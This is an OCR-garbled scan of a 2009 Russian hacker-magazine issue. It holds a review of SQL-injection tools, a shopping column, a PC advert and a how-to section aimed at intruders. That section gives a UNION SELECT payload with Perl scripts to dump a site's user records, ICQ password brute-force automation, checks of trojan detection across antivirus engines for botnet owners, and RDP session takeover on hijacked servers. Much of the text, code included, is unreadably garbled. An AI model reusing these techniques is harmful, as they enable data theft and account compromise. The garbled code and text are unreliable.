Помимо этого существует специальный проект — Оатп ѴиІпегаЫе 
ѴѴеЬ Арр ( ѵѵѵѵѵѵ.еіЫсаІЬаскЗг.со.ик ]. Написанное на РНР/Му501_, 
приложение содержит самые разные баги, какие только могут быть 
у веб-приложений. Если хочешь сэкономить время на настройку 



веб-сервера, поставь уже готовые сборки: Оепѵѵег ( ѵѵѵѵѵѵ. б епѵѵе лги ] 
или ХАМРР ( ѵѵѵѵѵѵ.арасЬеітіепбз.огд/халпрр-еп.ЫппІ. ]. 

Другие аналогичные проекты: 0ѴѴА5Р ѴѴеЬСоаІ: ( ѵѵѵѵѵѵ.оѵѵазр.огд/ 
іпбех.рбр/СаІ:едогѵ:0ѴѴА5Р ѴѴеЬОоаі Рго]есІ: ]. МибШбае ( ѵѵѵѵѵѵ. 
ігопдеек.солп/і.рЬр?раде=зесигі1:ѵ/лпиІ:іЩбае-бе1.іЬегаІ:е[ѵ-ѵи[пегаЫ.е- 
рбр-оѵѵазр-Іор-ІО ]. 51:аЫогб ВесигіВепсб ( зиіЕзІ:апІ : огб.есІи/~[іѵ5Іік5/ 
зесигібепсЫ . 

Площадки для демонстрации способностей своих продуктов 
создают и разработчики коммерческих сканеров, участвующих 
в обзоре. АсЫепіх предлагает сразу три сайта на разных плат- 
формах: іезірЬр.асипебх.солп. іезіазр.асипебх.солп, іезіазрпеТ 
асипебх.сот . Тестовый ресурс от НР располагается по адресу гего. 
уѵеЬаррзесигіІѵ.сот . Родной ресурс от пентестеров ІВМ — бегло. 
ІезІбге.пеТ 
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ОТЕЧЕСТВЕННАЯ РАЗРАБОТКА 
Х5РШЕК 



РЕАЛИЗУЕМ ИНЪЕКЦИИ 
С ПОМОЩЬЮ 501.5115 



< 

СЛЕПАЯ 50І.-ИНЖЕКЦИЯ 
С ПОМОЩЬЮ В50І.ВР 



'-зцітар 

здІтар.зоигсеіЪгде.пеІ: 
Платформа: ѴѴІпаоѵѵз, ІІпіх, 
Мае 

здітар — это уже более узкоспециализиро- 
ванная утилита, предназначенная специально 
для автоматизации 5С11_-инъекций. Написанная 
на РуіНоп’е тулза может обнаружить на сайте 
и эксплуатировать самые разные виды этой 
уязвимости, включая самые сложные слепые 
инъекции. Если здітар обнаружил возмож- 
ность инъекции, будь уверен — что-то ты да 
накопаешь. Впрочем, ее можно эффективно 
использовать в связке с более универсальными 
сканерами. Если Аррзсап или, скажем, продукт 
от Асипеііх нашел БОБ-уязвимость, ничего не 
стоит натравить на уязвимый сценарий здітар. 
Найти более мощный инструмент в пабли- 
ке достаточно сложно. Во время поиска 
багов и экспулатации уязвимостей скрипт 
учитывает специфицику МуБОБ, Огасіе, 
Роз^дгеВОИ, Місгозоіі БОБ Вегѵег. Помимо 
этого частично поддерживаются Місгозоіі 
Ассезз, 0В2, Іпіюгтіх, ВуЬазе и Іпіегбазе. 

Для того, чтобы понять, с какой СУБД мы 
имеем дело, здітар использует сложные 
методики Бпдегргіпііпд’а, основанные на 
анализе баннеров сервисов, сообщений об 
ошибках, форматирования вывода. Конечно, 
никакой автоматический скрипт не смо- 
жет довести проверку до конца без помо- 
щи человека. Но здітар — это отличный 
помощник, который может использовать как 
самые простые инжекции, так и сложные 
слепые (ЫіпсІ] инжекции. С его помощью 
ты можешь посмотреть системный баннер, 
выяснить имена текущего пользователя и 
базы, а также проверить, является ли юзер 
администратором. А быть может, повезет — 
и с помощью найденного бага здітар тут 
же вытащит список пользователя с хешами 
паролей, баз данных, таблиц, колонок — или 
вообще сделает дамп всех записей в табли- 
цах, или сможет выполнить произвольный 
БОБ-запрос. Мало этого, сканеру известно и 
о багах, позволяющих читать произвольные 
текстовые и бинарные файлы на серверах, 
где используются МуБОБ, РозІдгеБЭЕ и 
Місгозоіі: ВОЕ Вегѵег. А если на сервер уста- 
новлены тадіс_дио1:е5_дрс в настройках 
РНР, здітар непременно будет кодировать 
строку запроса с помощью СНАР(] или дру- 
гой подходящей функции. Это не просто 
утилита, это настоящий тизіЬаѵе! 



5ЯІ51І5 

- здІБиз.зкпеІ: 

Платформа: ѴѴІпсіоѵѵб, ІІпіх, 
Мае 

Специальная утилита для реализации инъ- 
екций в базы данных МуВОЕ. С помощью 
здізиз ты намного проще сможешь эксплу- 
атировать найденный баг, получив струк- 
туру базы, внедрив ВОЕ-запрос, скачав с 
сервера нужные файл, закачав бэкдор и 
т.д., и т.п. Примечательно, что в качестве 
инструмента для хранения полученных 
дампов используется база БОБіІе, что 
чрезвычайно удобно. Можно, например, 
сделать копию базы, переместив таблицы 
или колонки с уязвимого сервера себе в 
локальную базу на БОБіІе и полноценно 
работать с ней. Если ты не можешь обра- 
титься к базе іпіюгта1:іоп_5сЬеппа, или если 
ее не существует, тулза поможет пробрут- 
форсить название таблиц и колонок, здізиз 
поможет реализовать и ЫіпсІ-инъекции, но 
для этого лучше будет заюзать следующую 
утилиту. 

ЬзаІЬі-ѵ2 

соае.аоодІе.сот/р/ЬзрІЬПѵг 
Платформа: ѴѴІпаоѵѵз, ІІпіх 

Эта тулза специально разработана для осу- 
ществления слепых ВОЕ-инъекций. Причем 
изначально поддерживалась только МуБОБ, 
но в обновленной версии были реализованы 
методики сразу для трех других СУБД: МВ БОБ, 
Роз1:гдеВ0Е, Огасіе. ЬздІЫ написана на Регі, 
принимает ВОБ-запросы через командную 
строку и способна реализовать инъекцию в 
целочисленные и строковые поля. Всего под- 
держивается 6 видов слепых инъекций, а тип 
атаки обозначается с помощью ключа для 
запуска «-Буре»: 

. /Ьзд1Ь^-ѵ2 . 3 . рі -игі 
ЪЩДр : //192 . 168.1. 1/іпд есСіоп_ 
зСгіпд_розЦ/1 . з зр?р=1 -Суре 4 
-так сЪ. " кгие" -стсі "ріпд хакер, ги" 

В данном примере эксплуатируется уязвимость 
ОРАСБЕ бЬт5_ехрогІ_ехІеп5Іоп ехріоіі, позво- 
ляющая с помощью слепой инъекции выпол- 
нить произвольную команду, □с 



ний, построенных на базе ^ и А]ах: ведь ника- 
кой скрипт не может полностью сымитировать 
работу пользователя и проследить за всеми 
этапами выполнения приложения. На данный 
момент разработчиками реализованы модули 
для поиска Бді-инъекций, ХВВ и локальных 
инклудов. Сам процесс использования тулзы 
выглядит очень просто. РгохуВігіке работает в 
виде обычной прокси (по умолчанию на 8008 
порту], но помимо трансляции трафика в фоно- 
вом режиме выполняет фаззинг параметров, 
который твой браузер передает серверам. 
Архитектура приложения изначально легко 
расширяема, и ты можешь сам реализовать 
нужный функционал, написав соответствую- 
щий плагин. 



ХБрісІег 

ѵѵѵѵѵѵ.рЩесигіЩ.ги 
Платформа: ѴѴІпсіоѵѵз 

Первые строчки кода сканера ХБрісІег были 
написаны 2 декабря 1998 года, — за про- 
шедшие с тех пор 1 1 лет ХБрісІег стал изве- 
стен каждому российскому специалисту по 
информационной безопасности. Тулза с самого 
начала разрабатывалась как решение для 
анализа самых разных системы и обнаружения 
широкого круг уязвимостей. И хотя это тема 
для отдельного обзора, нельзя не отметить его 
модуль за анализ веб-приложений, благодаря 
которому программа и попала в сегодняшний 
обзор. Автоматический сканер быстро анали- 
зирует скрипты на заданном НТТР-сервере 
и выдает о найденных уязвимостях, в том 
числе БОБ-инъекций, инъекций кода, запуска 
произвольных программ, получения файлов, 
межсайтовый скриптинг (Х55), НТТР Пезропзе 
БрІіШпд. Более того, осуществляется поиск 
слабых мест в конфигурациии сервера, в том 
числе директорий, доступных для просмотра 
без авторизации. База сканера еще обновля- 
ется, хотя разработчики всецело переключи- 
лись на другой свой продукт — МахРаІгоІ. 



ХАКЕР 09 /129/ 09 
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КОЛОНКА РЕДАКТОРА 






РС_20ЫЕ 



■ ■ СТЕПАН «5ТЕР» ИЛЬИН / ЗТЕРОСАМЕЬАЫО.РІІ / 




Накрутки местных барыг подчас изумляют. То, что можно 
купить в Европе и Штатах за 100 долларов, у нас продают 
за 200. Если цена 200 там — здесь пытаются продать за 
500. Я не говорю о товарах, на которые распространяются 
серьезные таможенные пошлины — нет. Втридорога продают 
абсолютно все. Серьезную разницу я ощутил в августе, когда 
выбирал себе радар-детектор — это такой полезный девайс, 
который вешается на лобовое стекло машины и предупре- 
ждает об излучении различных ДПС-ных примочек. В свете 
появления мобильных камер, устанавливающихся в абсолют- 
но любое место, заблаговременно сбавлять скорость стало 
особенно полезным для кошелька :). Отыскав подходящий 
по характеристикам вариант, я поинтересовался стоимостью. 
Цена нужной модели на еВау составляла примерно $140, что 
более чем приемлемо. При этом тот же самый девайс дешев- 
ле 10000 руб. у нас было не найти! Ничего себе разница, 
правда? Убедившись, что никакой специфики в девайсах из 
разных стран нет, было принято единственно верное реше- 
ние — заказать девайс из Штатов. 

Заморачиваться с частными продавцами и мини-лавочками 
на еВау мне не хотелось, поэтому аналогичную позицию за 
$144 я быстренько нашел в другом месте — известном запад- 
ном магазине Атагоп.сот. Но стоило только приступить к 
оформлению заказа, как меня поджидал традиционный для 
таких ситуаций облом: доставка товара магазином возмож- 
на только по США и Канаде. «Не отправляем в Россию — и 
точка». Сдаваться не хотелось, поэтому я решил поискать 
компании, которые могли бы выступить посредниками в этой 
операции. 

Оказалось, что обойти подобное ограничение не так уж и 
сложно, и помочь в этом может специальный почтовой адрес 
в США, зарегистрированный на твое имя. «Виртуально» про- 
писать тебя на территории Штатов предлагают специальные 
посреднические компании. Получив посылку на твое имя, 
они отправляют ее дальше в любую точку мира — главное, 
указать адрес и положить деньги на депозит. Положительные 
отзывы я нашел по ѵѵѵѵѵѵ.тѵиз.сопп и ѵѵѵѵѵѵ.зЫріТо.сопп . Второй 
из них оказался дешевле — его-то я и выбрал. 

Во время регистрации тебе необходимо с помощью пласти- 
ковой карты или РауРаГа будет перечислить на свой депозит 
$8.50. Это не плата за регистрацию, а цена обработки одной 
посылки компанией. После этого ты получишь примерно 
такой адрес: 



5ТЕРАШШ 
С/0ЕА5ТВІ2С0РР. 
2972 С0ІЛШВІА5Т. 
51ІІТЕ # 6711 
Т0КШСЕ,СА 90503 



Маленький городок в Калифорнии — и ни слова о России. :) 
Недолго думая, я сделал повторную попытку заказать товар. 
Атагоп без проблем принял адрес и предложил перейти 
к оплате. Согласившись поучаствовать в какой-то триаль- 
ной программе, я получил еще и бесплатную доставку по 
Штатам. 

И вот — уже через несколько дней посылка бесплатно была 
доставлена в ЗЫріТо. В этот момент к тебе приходит письмо 
с просьбой заполнить декларацию, указав ее содержимое 
и стоимость, а также выбрать вариант для отправления. 
Товары до 10000 руб. в неделю пошлиной не облагаются, 
поэтому я указал все как есть и оплатил необходимые за 
доставку деньги (что-то около $35], выбрав ІІ5Р5 Ехргезз 
Ма і I (аналог нашей почты]. Кстати говоря, сразу отправлять 
себе посылку совершенно не обязательно. Если ты заказал 
несколько предметов в разных местах, то ЗЫріТо может 
перепаковать их в одну посылку. Плата за это небольшая, 
а сэкономить на доставке можно очень и очень много. 

Моя посылка шла ровно 10 дней, причем на протяжении 
всего времени я мог отслеживать ее на сайте ІІ5Р5 и ЕМ5 
( ѵѵѵѵѵѵ.етзрозЕги І по номеру отправления. Из всего срока 
доставки существенный лаг вносит наша таможня, но зато 
после нее посылку мне доставили лично курьером. 

Зачем я это рассказал? Да потому, что потратив полчаса, 
ты можешь заказывать предметы по двое меньшей цене и 
с намного большим ассортиментом. Даже если магазин не 
отправляет товары напрямую в Россию. Девайс, который 
здесь не купить дешевле десяти тысяч рублей, удалось при- 
обрести за $186. Конечно, жертвой стала скорость доставки, 
но ради почти двукратной экономии я готов подождать. 
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іпІёі ) 

компьютер НАЧИНАЕТСЯ 

С ІМТЕІ*. 



Корпорация ІпІеі не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений относительно 
конкретных компьютерных систем, упоминание о которых содержится в данном документе. 



(Ват? 

КОМПЬЮТЕРЫ ОРГТЕХНИКА 
КОМПЛЕКТУЮЩИЕ 



Интернет-магазин: млллл/.ТсепЪег.ги шллплЩсаНор.гчл 



Адреса салонов-магазинов: 

м. «Бабушкинская» ул. Сухонская, 7 А м. «Беляево» ул. Миклухо-Маклая, 55 

м. «Владыкино» Алтуфьевское ш., 1 6 м. «Улица 1905 года» ул. Мантулинская, 2 



Персональный компьютер РІ.ЕХТВОІМ® Ргетіега 
на базе процессора ІпЪеІ® Соге™2 Оио 



Единая справочная: ( 495 ) 925 - 64-47 



Для получения дополнительной информации о рейтинге процессоров ІпЪеІ посетите сайтиллплі.іпЪеІ.ги/гаЫпд. 



Процессор ІпЬеІ Соге 2 Оио Е7400 

Графический процессор 

ІМѴЮІА беРогсе 96006Т 

Материнская плата А3118 Р50І.-Е 
Оперативная память 4СВ 
Жесткий диск 500 ГВ 

0Ѵ0-Щ Саге! Веабег АІГіп-1 

Операционная система 

ѴѴіпсІоѵѵз ѴізЪа Ноте Ргетіит 



Просматривая рекламу обычно не читают строки набранные мелким шрифтом. 

Максимум - пробегают заголовки. И очень жаль, поскольку так никто и никогда не сможет узнать, что: 

1 Процессор ІпІеі® Соге™2 Оио двухъядерный - а это в два раза быстрее, чем очень-очень быстро! Что совершенно 
необходимо для того, чтобы не провести свою драгоценную жизнь перед песочными часами на экране вашего люби- 
мого компьютера, в ожидании завершения какой-то простейшей операции... 



Что всего через год все компьютерные игры станут по-настоящему объемными и ваш новый ПЕКТНОМ Ргетіега 
уже готов к ним и значок ЗПЗіегео взят не из фантастического романа, а из нашего с вами ближайшего 
будущего! 



Что большой и надежный жесткий диск дает возможность хранить больше фотографий, музыки и фильмов... А 
прекрасная оснащенность компьютера Н.ЕХТИІШ Ргетіега дает вам возможность не думать о том - есть в вашем 
компьютере нужный разъем для вашего нового «гаджета» или нет... Он однозначно есть!.. 



4 Наконец, что предустановленная операционная система ѴѴіпііоіліз Ѵізіа Ноте Ргетіит - это не последствия 
«борьбы с пиратством», а очень удобный инструмент, по-настоящему надежный, делающий общение с компью- 
тером доступным самым обычным людям. Таким как мы с вами. А не только узкому кругу хакеров, специалистов- 
компьютерщиков, гуру и прочим профи... 

Ну и наконец, что сейчас ПЕХТНОМ Ргетіега продается за 19 990 рублей - 
что совсем немного для действительно хорошего, быстрого и современного компьютера. 



Что выбрать? 

Максимум возможностей?! 

Или ничего лишнего!? 

РІ.ЕХТПОІЧ® Ргетіега - 

опіличнми компьютер 
для вашего оінлишика / 






Хотите узнать больше про компьютеры и современные технологии? 
Приходите в наши магазины! 



Ищи знак 

Іпіеі 

Іпзісіе® 



©2009 г, Сеіегоп, Сеіегоп Іпзісіе, СепТгіпо, СепТгіпо Іпзісіе, логотип СепТгіпо, Соге Іпзісіе, логотип ІпТеІ, ІпТеІ, ІпТеІ Соге, ІпТеІ ІПБІсІе, логотип ІпТеІ Іпзісіе, ІпТеІ Ѵііѵ, ІпТеІ ѵРго, ІТапііщ Капіигй Іпзісіе, 
Репііит, Репбит Іпзісіе, Ѵііѵ Іпзісіе, ѵРго Іпзісіе, Хеоп, и Хеоп Іпзісіе являются товарными знаками права на которые принадлежат корпорации ІпТеІ на территории США и других стран. 
Все права защищены, Реклама. 
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№1 



ЗАДАЧА: АВТОМАТИЗИРОВАТЬ 
БРУТ АСЕК С ИСПОЛЬЗОВАНИЕМ 
.ВРІІТАЬ 



РЕШЕНИЕ: 

.Вгиіаі является одной из популярнейших софтин для брута асек, посему 
желание автоматизировать его работу — вполне понятно. Для осуществления 
задуманного мы воспользуемся утилой 5іогт 2008 Вгиіаі Ебіііоп, которая пред- 
ставляетсобой аналогуже известной тебетулзы 5іогт 2008 и предназначена 
для облегчения управления брутом. Из основных особенностей инструмента 
стоит выделить: 

• Возможность управления . Вгибаі'ом (например, запуск/останов 
ка брута, сіеапир, отображение статистики, ебс) 

• Доступ к виндовой консоли на удаленном дедике 

• Отправка валидных пар уин;пасс тебе в асю : ) 

• Организация очереди списков для брута 

• Автоматическое обновление проксиков по таймауту 

• Удобная система администрирования 

• Возможность управления брутом с нескольких номеров, с указа- 
нием индивидуальных настроек 

• Загрузка удаленных файлов, ісд дабе (использование 
бота в качестве гейта) , отправка и принятие сообщений и 

т . д . 

• Возможность использования бота в качестве гейта 






© 



«опт 





ЗсигсеГѴ» 







5іор 






РІудігч 



А6ШШ | [ кияв ІЯ | | Нф | [ АЬоШ | 



Автоматизируем брут асек 

/абтіпіізб — отобразить админ-лист 
/абб ИШ[ :регтіззіопз] — добавить уин в админ-лист 
/беіебе ПШ — удалить уин из админ- листа 

/рсйапде иШ:регт_іпбех:регтіззіоп, /рсйапде ШИгрегтіззіопз 
— изменение прав 

/зеббіпдз - отобразить настройки бота 
► Команды управления сурс-листами: 

/згсіізб — отобразить список сурс-листов 



Настройка софта и управление брутом нетребуетособыхусилий. Необходимо 
лишь произвести ряд нехитрых манипуляций: 

1. Сливаем утилу с нашего диска. 

2. Вбиваем данныеуина для бота. 

3. Управляем ботом при помощи команд: 

• Команды управления .ВгіЛаГом: 



/згсабб - добавить сурс-лист 

/згсбеі — удалить сурс-лист 

/деп — сгенерировать новый сурс-лист 

/деп+ — генерация нового сурс -листа с чеком строк на дубли 



► Команды управления проксиками/соксами: 



/збабз — отображение статистики 
/збагб - нажать баттон 'збагб' 

/збор - нажать баттон 'збор' 

/бЪхеабз — установить количество потоков 

* Команды управления ботом: 



/Аббрз - сохранить йббрз-прокси лист (ір:рогб) 

/зоскз4 - сохранить сокс4-лист 
/зоскзБ - сохранить соксБ-лист 

/ирб [ргоху_бурез] [ргоху_ирбабе_буре] - обновить прокси-лист 

Ничего сложного в процессе управления ботом нет. Так что можешь смело авто- 
матизировать брут, избавив себя от рутины :]. 



№2 



ЗАДАЧА: НАСТРОИТЬ СОБСТВЕН- 
НЫЙ АНОНИМАЙЗЕР С АВТОМАТИ- 
ЧЕСКОЙ СМЕНОЙ ІР-АДРЕСА 



РЕШЕНИЕ: 

Еслиты не привыкюзатьпабликпроксики по известным причинам, а платным 
сервисам недоверяешь — остается лишьодин выход: поднять собственный 
прокси. К счастью, сделать это довольно просто, благо, есть масса готового 



софта :]. Примертому 
— НТТР босаі Ргоху. 
Именно эту софтину мы 
и будем использовать. 
Прога представляет 
собой анонимайзер, 
работающий через пхп- 
гейты. Настроить утилу 
несложно: 
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1. Сливаем утилу с нашего диска. 

2. Распаковываем архив, в нем три файла: даіе.рбр, ЬозДМ, ргоху.ехе. 

3. Зал ива ем скрипт даіе.рЬр на хост (или несколько хостов]. 

4 . В файл ЬозІ.М прописываем полный путь до залитого скрипта даіе.рбр, 
например: 

зіДе . сош/даДе .ркр 
зі Де2 . сош/даДе . рЬр 



зіДеЗ . сош/даДе . рЬр 

5 . Запускаем ргоху.ехе, по дефолту открывается порт8080 и загружается список 
хостов из файла ЬозШД 

6. Открываем браузер, прописываем хттп-прокси 127.0.0.1 и порт, на котором он 
запущен (по дефолту — 8080]. 

Воти все. Еслифайл ЬозДМ содержит более одного адреса, то ргоху будет автома- 
тически менять ІР-адреса. Что нам итребовалось :). 



№3 



ЗАДАЧА: СЛИТЬ БАЗУ ЮЗЕРОВ ЧЕ- 
РЕЗ 50І_-ИНЪЕКЦИЮ 



РЕШЕНИЕ: 

Обнаружив скуль-инъект на каком-нибудь портале, тебе, наверняка, захо- 
чется слить оттуда всю базу юзеров. Какты понимаешь, перебирать сотни, 
а порой итысячи записей вручную, используя ІітіД или Дор — не очень 
удобно. Поэтомутребуется автоматизация процесса. Рассмотрим пример: 

1. Допустим, найденныйтобой зці-инъектвыглядиттак: 

ЬДДр : / /ЫаЫаЫа . сош/радез . рЬр?ій=-1+ШІ(Ж+8ЕЬЕСТ+1 , 2 , соп 
саД ( скаг (94) , ісі , сЬаг (58), паше , скаг (58), зигпаше , скаг (58), 
сіДу , сЬаг (58) , асМгезз , скаг (58) , ешаіі , скаг (94) ) ,4, 5, б, 7, 8, 
9,10, 11+Дгош+изегз+ІішіД+І ,1/* 

2. Теперьсоздаем файл дгаЬЬег. рі следующего содержания: 

# ! /изг/Ьіп/регІ 

ргіпД "===================================\п" ; 

ргіпД "= ЗОЬ-іптесДіоп СгаЬЬег =\п"; 

ргіпД ,, ===================================\п" ; 

изе ШР: :8ішр1е фЩ деД) ; 
ореп(Е, 1 >гези1Д . ДхД ' ) ; 

$2=0; 

Дог ($і=0 ; $і<=1000 ; $і++) { 

$игі="]іДДр : //ЫаЫаЫа . сош/радез фкр?іЦ=-1+ШІОБ+ЗЕЕЕСТ+1 , 

2 ,сопсаД (сЬаг (94) , ісі, скаг (58) , паше , сііаг ( 5 8 ) , зигпаше , сЬаг ( 5 8 
) , сіДу , скаг (58) , асМгезз , сЬаг (58) , ешаіі , сЬаг (94) ) ,4, 5, б, 7, 8, 
9,10, 11+Дгош+изегз+1ішіД+$і , 1/* " ; 

$сопД=деД ($иг1) ; 
ргіпД Е $сопД . " \п" ; 

$2=$2+1 ; 

ореп(С, 1 >соипД . ДхД 1 ) ; 
ргіпД С $ 2 ; 
сіозе С; 

} 

сіозе Е; 

ореп ( Б , 1 хіопе . ДхД 1 ) ; 
ргіпД Б $2 . " \п" ; 
сіозе Б; 



#ргіпД " =================================== \п" ; 

#ргіпД "= БОБЕ =\п" ; 

#ргіпД "===================================\п" ; 

#ргіпД $ 2 ; 



Обрати внимание на переменную $и К, а также на переменную $і — она 
определяет количество записей в табличке. 

3. Запускаем граббер на удаленном хосте и ждем. Стата будет писаться в 
файл соипДМ. 

4 . Послетого, как работа граббера закончена — создаем файл рагзег.рі: 



# ! /изг/Ьіп/регІ 

ргіпД "===================================\п" ; 

ргіпД "= 80Б-іп]есДіоп Рагзег =\п"; 

ргіпД "===================================\п" ; 



ореп(ТТ, ' гезиІД . ДхД 1 ) ; 
ореп(Е, 1 >гези1Д2 . ДхД ' ) ; 
ѵгііііе ($1іпе = <ТТ>) 

{ 

$х=іпсіех($1іпе, ,,ЛП ); 

$ 2 =гіпсіех($ 1 іпе, ПА,, ) ; 
іД($х>-1 && $ 2 >— 1 ) { 

$ 1 опд=$ 2 -$х; 

$гез=зиЬзДг ($1іпе, ($х+1) , ($1опд-1)); 
ргіпД Е $гез . " \п" ; 

$х= - 1 ; 

$ 2 = - 1 ; 

} 

} 

ргіпД "===================================\п" ; 

ргіпД "= БОБЕ =\п" ; 

ргіпД "===================================\п" ; 

сіозе ТТ; 
сіозе Е; 

5 . Парсер выберет из мусора все записи, обрамленные символом Л . На 
выходе ты получишь читабельную базу с данными юзеров. Кстати, учти, 
что граббер — однопоточный. Крупную базуутянуть им в ряд л и удастся, 
однако никто не мешаеттебе приложить усилия и переписать его, добавив 
пару полезных функций :). 
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ЗАДАЧА: ПРОВЕРИТЬ ЕХЕ’ШНИК 
НА ПАЛЕВНОСТЬ РАЗЛИЧНЫМИ 
АНТИВИРЯМИ 



разумнее воспользоваться автоматическими сервисами по чекингу 
файлов. 

1. Платные сервисы: 



РЕШЕНИЕ: 

Если утебя свой ботнет, или ты просто решил над кем-то поглумиться — 
проверить ехе-шниктроя просто необходимо. Однако десятокантивирей 
себе не поставишь, да и проверять вручную — дело неблагодарное. Гораздо 



• аѵсЬеск.ги 

• аѵсЬеск.Ьіг 

• аѵ-скеск. сот 

• ѵігДезД . сот 
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2. Бесплатные сервисы: 

- ѵігизбобаі . сот 

- ѵплпл7.поѵігизЬЬ.апкз.огд 

- ѵігиззсап. □ оісісі . огд/ги 

- зсаппег .ѵігиз .огд 

- ѵігзсап.огд 

Описывать бесплатные сервисы я не буду, ибо большинство из них отсылает копии 
твоих файлов в антивирусные компании для дальнейшего анализа, что не есть гут. 
Вместо этого мы остановимся на двух крупнейших платных сервисах — аѵсЬеск. 
ги и ѵігіеБі.сот . Первый предлагает следующиетарифы. 

Обычная проверка: 

$1-1 проверка 
$10 - 20 проверок 
$15 - 40 проверок 

Автоматическая проверка: 

$15 — раз в 48 часов (в течение 3 0 дней) до 2х файлов + бонус 5 
обычных проверок 

$20 - раз в 24 часа (в течение 30 дней) до 2х файлов + бонус 10 
обычных проверок 

$25 - раз в 24 часа (в течение 30 дней) до Зх файлов + бонус 20 
обычных поверок 

Списокантивирусов довольно широк: 



Апбіѵігиз Ѵегзіоп Кезиіі: АѴС 8.5- АгсаѴіг 2 009 - АибЬепбіит 
5.1 - Аѵазб 4.8. 1229 - Аѵіга 7 . 9 . 1 .1 - ВібБебепбег 7 .90 

- СІатАѴ 0.95.2 - БгМеЪ 5.0- Р-Ргоб б . 0 - Р-8есиге 8.0- 
Казрегзку 8.0.0.506 - МсАбее 5711 - ЖЮ32 4342 - РІогтап 6.01.09 

- Рапба 9.04- Зорбюз 4.44- Зутапбес 10.2. 

Все, что оттебя потребуется: 

1. Заходим на сайт сервиса — іеск.ги . 

2 . Регистрируемся. 

3. Пополняем баланс аккаунта. 

4 . Выбираем режим ручной проверки. 

5 . Заливаем файл. 

6. Через несколько секунд смотрим результат проверки по всем антивирусам. 
Аналогичным образом работает и ѵігі п, основным его отличием является 
возможность проверки нетолько ехе’шников, но и связоксплойтов. Чем пользо- 
ваться — выбирать тебе, анонимность твоего файла втвоих руках :]. 



-чсниіі 

АЬв 







Чекаем ехе’шник 



ЗАДАЧА: ПРОСКАНИТЬ ДИАПАЗОН 
НА ПРЕДМЕТ НАЛИЧИЯ УЗЛОВ С 
НУЖНЫМ ОТКРЫТЫМ ПОРТОМ 

РЕШЕНИЕ: 

99% людей, наверняка, скажут: «Нетничего проще! Запускаем птар с 
ключами -Р5<роіі> -р <рогІ> АА.ВВ.СС.ОО/ММ». И будутправы, нотолько 
отчасти. Действительно, сеть класса С можно просмотреть и так, но что 
делать с В и А сетями? Пока птар будет ска нить, сам Иосиф Сталин успе- 
ет воскреснуть из небытия, прийти к власти и запретить весь интернет как 
пагубную сточки зрения морального воздействия на умы индивидуумов 
среду. Тут нужно что-нибудь простое, быстрое, желательно многопоточ- 
ное. Какнасчетскана в 2500 потоков одновременно? По-моему, для этой 
задачи в самый раз. 



1. Берем софтину под названием сіііпсі (ее можно найти на компакт-диске). 

2 . Вбиваем команду: 

ббігкі -р 33 89 <збагб_ір> <епб_ір> 

3. Замеряем скоростьскана сетки 88.35.0.0/16 (вбиваем команду «сІТіпсІ 
-р 3389 88.35.0.0 88.35.255.255»). Получаем 3 минуты 40 секунд и файлик 
весом 7 килобайте результатами работы. Кстати, результаты сохраняются 
в очень удобной форме в виде <хост>:<открытый порт>. С той же задачей 
ІЧтар справился за 29 минут 4 секунды. Конечно, птар может выдать еще 
кучу инфы о сервисах, определить ОС и все такое, но на хрена оно нам 
здесь надо? Крометого, птар гораздо медленнее, и послетого, какой 
отработает, тебе еще придется парсить результаты. 



№5 



птар ѵз сШпсІ 
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№6 



ЗАДАЧА: ОТКЛЮЧИТЬ 
ТЕРМИНАЛЬНУЮ СЕС- 
СИЮ ПОЛЬЗОВАТЕЛЯ 
СЕРВЕРНОЙ ВЕРСИИ ѴѴІЫ00ѴѴ5 СРЕДСТВА- 
МИ РйР 



РЕШЕНИЕ: 

Если 5МВ-сервисы недоступны, установка доверительных отноше- 
ний и инвентаризация сессий невозможны. Во многих случаях сер- 
вак вообще находится за файром и единственный способ подклю- 
читься к нему — воспользоваться портом 3389 и клиентом тзізс. 

Однако традиционный коннект не проходит, так как вываливается 
сообщение с ошибкой о превышении количества сессий и соеди- 
нение закрывается. Значит, надо подключаться куже установ- 
ленной сессии. Для этого в клиенте предусмотрен ключ /сопзоіе, 
который позволяетудаленно подключиться к сессии локального 
пользователя, или зеззіоп 0. Однако стоит отметить, что, начиная с Управление терминальными сессиями 
ѴѴіпсІоѵѵз ХР 5РЗ, ѴѴіпсІоѵѵз Ѵізіа 5Р1 и ѴѴіпсІоѵѵз 5егѵег2008, клиент ппзізс 
ключа /сопзоіе уже не имеет. Связано это стем, что в новых версиях ОС 
от Мі сгозоЯ: нулевая сессия перестала быть интерактивной и использу- 
ется только для запуска системных процессов и сервисов. Интерактивные сессии 
пользователей нумеруются, начиная с единицы. Ничего страшного тут нет, просто 
вместо ключа /сопзоіе в таких случаях следует использовать ключ /абтіп. 

1. Подключаемся ксуществующей сессии: 



- ТегтшаІ Зегѵісе? Мвпадег 



Йсііоп* Щеѵѵ ІрсЬ Ьеір 



д(М ѵ>іаі Н&І ШІ 



/У ТЫ$ сотрут 
Ф РаѵогіЬе «гѵ&і 
ф АЛ ІЁІегі Зегѵеге 



| 5еяіоп8 I Ргасе*«® | 



Зеіѵег 






I 5кярп | ІР | 5(дДв | Іс 



Ш 8ТАМО ЭЕПѴЕЙ Дйтіпіісйіѵ ПОР-ТерВі... 0 АсЬѵе 

Э 5ТАИР5ЕПѴЕВ АЛйгЙЬЛ* ВОР ТсрШ.. 1 Асйѵе 

Агітігйігаім ВОР-ТсрМ1.„ 5 Асііѵе 



2. Запускаем ТегтіпаІЗегѵісез Мападег: 



Сзасітіп 



тзДзс /ѵ:<зегѵег_аскігезз> /сопзоіе (/абтіп) 



3. Отключаем какую-либо сессию (кроме нулевой :]]. 

4. Коннектимся к серверу по РОР. 




ЗАДАЧА: ОТКЛЮЧИТЬ ТЕРМИ- 
НАЛЬНУЮ СЕССИЮ ПОЛЬЗОВАТЕЛЯ 
СЕРВЕРНОЙ ВЕРСИИ ѴѴШйОѴѴЗ 



СРЕДСТВАМИ КОМАНДНОЙ СТРОКИ 



изег : <а<±піпізДгаЦог_изег_пате> 

2. Инвентаризуем сессии и запоминаем идентификатортой, которую 
следует откл юч ить: 



РЕШЕНИЕ: 

Уверен, разты читаешь - !" , то для реализации своихзлодейскихзамыслов 
нередко прибегаешь кпомощи сторонних серверов (в простонаро- 
дье — дедиков). Иногда сервер выплевывает недружелюбное сооб- 
щение «ТегтіпаІзегѵегЬазехсеесІесІ ІЬе тахітит питЬего^аІІоѵѵесІ 
соппесбопз» и исключает возможность дальнейшей работы. Проблема 
кроется в отсутствии лицензий терминального доступа, в результате 



